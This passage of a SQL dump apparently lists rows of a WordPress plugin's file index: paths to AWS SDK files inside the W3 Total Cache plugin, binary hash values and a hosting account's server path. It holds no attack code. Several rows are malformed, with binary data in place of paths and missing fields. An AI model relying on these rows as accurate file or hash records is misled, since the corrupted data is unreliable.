gins/w3-total-cache/vendor/aws/aws-sdk-php/src/Signature/SignatureProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZnJL\\\Z','ueT<ߖSK\':\0','',0,'?'),('PH7xVu^,Kzu|&','',0,'?'),(' \rfg~Sj','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sms/SmsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sms/SmsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','әP>G\r_','&%8DO\\FfIBӶUH4Mq2','',0,'?'),('(*΃Ԁm+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/Exception/SnowBallException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/Exception/SnowBallException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' L5,u妐ی','cݳ^b\n*y+D bjw','',0,'?'),('ݎ|#= o','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/SnowBallClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SnowBall/SnowBallClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Pđ/kIa','\' *?-RwRf\nX#߶.','\\fZUZÅASe, eP!ia','',0,'?'),('L,\Z/>*݋8x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sns/SnsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sns/SnsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̙ޝ\"#fOp\Z;','\\ZKAF=A|;/\"3c3xu$Nʥ','',0,'?'),('y؆\'nLn?9','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sqs/Exception/SqsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sqs/Exception/SqsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UEgQ5wy|Е,r','',0,'?'),('Wf]剑ʵ','',0,'?'),('߾,6 x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StorageGateway/StorageGatewayClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/StorageGateway/StorageGatewayClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' YIe>γ','l|nN\'vF5Yvl]|6E.z-','',0,'?'),('\\D\nB5w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/Exception/ConfigurationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/RegionalEndpoints/Exception/ConfigurationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_ \n9{$+b','G1^{R1}dD\ZS{}6','',0,'?'),('$(d=pt','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/StsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sts/StsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\0W@= e','ٽ,ݲfY_Ǯ4=','',0,'?'),(' 5 \\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/Exception/SupportException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/Exception/SupportException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-?V+=ty/:iZ','',0,'?'),('b<X4!e\":','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/SupportClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Support/SupportClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MqNCٔԵCb','\Zf\"v3%½{','',0,'?'),('%E=k/<','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/Exception/SwfException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/Exception/SwfException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CT=r\'Bߖl','?ڮj6ͨEՁ~6=~QZ','',0,'?'),('p}K6׈vV}s','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/SwfClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Swf/SwfClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o \rC;TTGX','m w1c%SQ4g%RMI7ێ','',0,'?'),('i:f07fHӀ.','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/Exception/SyntheticsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/Exception/SyntheticsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bmPQir','WpQ2)Ƚ OM]{-pgًVZ','',0,'?'),(' ys6;?\n\\x\0J','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/SyntheticsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Synthetics/SyntheticsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B)ՠ ̥G','\n&5kBeR]C@4a','',0,'?'),('wLyq#|8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/Exception/TextractException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/Exception/TextractException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','īӷiWSٮ{','܆ki{Ο_~z$e^F&','',0,'?'),('//Fi>','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/TextractClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Textract/TextractClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_1*qi.S','چ1uZ4x*ӈvIb|x2\'','',0,'?'),('s0[O!<','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/Exception/TimestreamQueryException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/Exception/TimestreamQueryException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qg e2\\','דB*TU,Ը?Ѧ/Q:3e','',0,'?'),('FI1n|Z,/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/TimestreamQueryClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamQuery/TimestreamQueryClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Hdcŕz_u','n,#PL\"yc=UZbPv','',0,'?'),('u\ny8̛v','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/Exception/TimestreamWriteException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/Exception/TimestreamWriteException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fR[̡e1*X','-\r*ozUڷŸrV/փXV]Z','',0,'?'),('fw5','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/TimestreamWriteClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TimestreamWrite/TimestreamWriteClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|VCD2','8z\"Dcuк (\"YK8\"@','',0,'?'),('Xqp[\r%\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TraceMiddleware.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TraceMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DDs̳};^P','\Z].Zr2J&wʥ [c/ ','',0,'?'),('r[aaDucW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/Exception/TranscribeServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/Exception/TranscribeServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D:Y?C϶','Zڹan2|jyoVڰ&;iz','',0,'?'),('jÌ\rNHz@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/TranscribeServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/TranscribeService/TranscribeServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dzE4uZj\r\'','?\'MﮰQ/_C7Os','',0,'?'),('ُ3 +sԘ6','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/Exception/TransferException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/Exception/TransferException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6x\'.x','.wa|k0rm{,ͣۋX[p^_ ,','',0,'?'),('*̺rGǝEe','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/TransferClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Transfer/TransferClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gèze#/','z5le\n+u\rgOiUbl','',0,'?'),('9]QQj\'o','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/Exception/TranslateException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/Exception/TranslateException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vnB+˯cJP=','f{VIW8AB[>ʏ','',0,'?'),('iԊL?mu','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/TranslateClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Translate/TranslateClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jK2.H\rD@h','J~4 ~+D`+Ʉ\r .4a\'\"','',0,'?'),('JB/o$gfb','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/Exception/WAFV2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/Exception/WAFV2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U&Vףo}\'','Lΰ<P+!ghzON4&i˖','',0,'?'),(' c$]r49w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/WAFV2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WAFV2/WAFV2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZE N]erU','jvACJ aЀڝ#f h','',0,'?'),('Iِ^Q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/Exception/WafException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/Exception/WafException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$^pѮ.Ip5',')\rEuP\ZVyBU:','',0,'?'),('$YvI','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/WafClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waf/WafClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0cES]','K%Scܹ ٱ>G>pb','',0,'?'),('U)Q^6hy','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/Exception/WafRegionalException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/Exception/WafRegionalException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pڸYRحWV','?7Ql0:uԘ^SbD5EГ\'x','',0,'?'),('rƲ$Ay=jp','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/WafRegionalClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WafRegional/WafRegionalClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x.`QM','|lCIr`~++!#NR_p{','',0,'?'),('l7>Gj\ZK&','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waiter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Waiter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\'`{guVj','{ 7|1#9j@\"BSe','',0,'?'),('tݲy:W','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/Exception/WellArchitectedException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/Exception/WellArchitectedException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gy)GK&\Zv','\Z*2PPEO]uXbl+<H','',0,'?'),('oteDB2jA','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/WellArchitectedClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WellArchitected/WellArchitectedClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \ZXB}L+','eLA\0X;4ɚϲ?!׮ ','',0,'?'),('F]I\'ŐP','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/Exception/WorkDocsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/Exception/WorkDocsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qzV{uy#A','_<;[3_L,r;m','',0,'?'),('tWb]j&M\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/WorkDocsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkDocs/WorkDocsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IG-\Z$j','&v|]Lo<K^Ǐ5/}','',0,'?'),('\r\0I6+^b','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/Exception/WorkLinkException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/Exception/WorkLinkException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jy5 z.','>`ɑқX&SDX\"','',0,'?'),('ey#֑$4','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/WorkLinkClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkLink/WorkLinkClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zro~?b)','_3wܪ*f1IE(oƓLS@','',0,'?'),('h5:sd6','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/Exception/WorkMailException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/Exception/WorkMailException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','90&xHv@B#z߿p','v[@:AK$/ܨE3#','',0,'?'),('$\'١|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/WorkMailClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMail/WorkMailClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wZ!ۯSkS;','y)x{up$X0]4n+ O޳','',0,'?'),('(Aag|~I','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/Exception/WorkMailMessageFlowException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/Exception/WorkMailMessageFlowException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UjڨN','D3WDV!{_|B)̜n','',0,'?'),('}%#`) ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/WorkMailMessageFlowClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkMailMessageFlow/WorkMailMessageFlowClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vDoH?p! \'','d520dƚXi G}','',0,'?'),('IQ׆!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/Exception/WorkSpacesException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/Exception/WorkSpacesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cٛod','u&;SLr3 BeY  .$','',0,'?'),('S7`zn','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/WorkSpacesClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WorkSpaces/WorkSpacesClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"5Zx=3ѫ4','\\\nGfB.L%f鵌^N? @','',0,'?'),('}K*AdsC\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s2ն\rX;;','֠8fuvjʌ٨/@R U^ER|','',0,'?'),('s\'؋>','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/Exception/XRayException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/Exception/XRayException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rLJ.JAly;\n','f_T8z[Kg6rv$!M ','',0,'?'),('/B\\/D','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/XRayClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/XRay/XRayClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ߖZ!J2','oa9T$uvǀx','',0,'?'),('9(M]m=$2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݞæӣsLb9*9','yj s604$0:hk','',0,'?'),('BqˁQuDL`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/accessanalyzer/2019-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2GjSbc}','WV@dz↡Ѐ4 L:s~N','',0,'?'),(')xg*PB','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qu\"|_x\Z','-\'!PqÍ^\ZX\0','',0,'?'),('Z\r!hD2{&:L','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m&ݼ28Ȭ?I34','uspNJaeB%M\0f`6','',0,'?'),('s.$$L;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','70|Np','NRC \"P2*k17:','',0,'?'),('\Z`!A3UW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/:xե','oڟ+沗U0|)@\'buEH\Z','',0,'?'),('Ye ՋM4','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ROIjVU ','$D6#E5xɯر','',0,'?'),('+1X%jK L','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nA(n','\"D/M+CցN2գz/Dg߇M','',0,'?'),('!~4ݕq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/acm-pca/2017-08-22/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\DdؽTk','ZN\"%=[FX즛zu','',0,'?'),(' ]]?\0\nOK','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VЧ fN ','UO^!`@_n~','',0,'?'),('^M:|\ra','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/alexaforbusiness/2017-11-09/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XܹvB','hkNv\n(8LF','֥rX\r‡fEIm[R߁','',0,'?'),('ǵW3Bƅ7RW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ur̍Q!5dc','\r\ZCrsLSYji=k','',0,'?'),('-\0Ce6Ay','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplify/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' XHkVO','+p& JQ-.Od\\Ax )?','',0,'?'),('d瀀A!)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"}L ;.|gd','\Z[M.~FermtY⌍M6y\ZnS','',0,'?'),('ۧF&r\' ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/amplifybackend/2020-08-11/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')V6nՕY','-u0quq)!\r¹`6,','',0,'?'),('0(l1cbm~ZQ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+C*]\"!\0A!','u $D#>`;ĖI#jb&','',0,'?'),('EEs','Y7[N3(Qu9A','',0,'?'),('_llX:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ryq&#<','3X ?ioџeMKMV','',0,'?'),('.i%,, L','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-J3e\0ʉ','U3~GqպJg%$0bQ(5','',0,'?'),('6oȇA7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȭ,:Dpo&','TiF\n7>NdD N>','',0,'?'),('׹,T,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\Z\\NkY\Z','*T06vړWPxRB]B\'- !H','',0,'?'),('ЍK&7:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J=qHv\n>','] C$#Yg<ݻ{)JƸ','',0,'?'),('B#,]o','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0 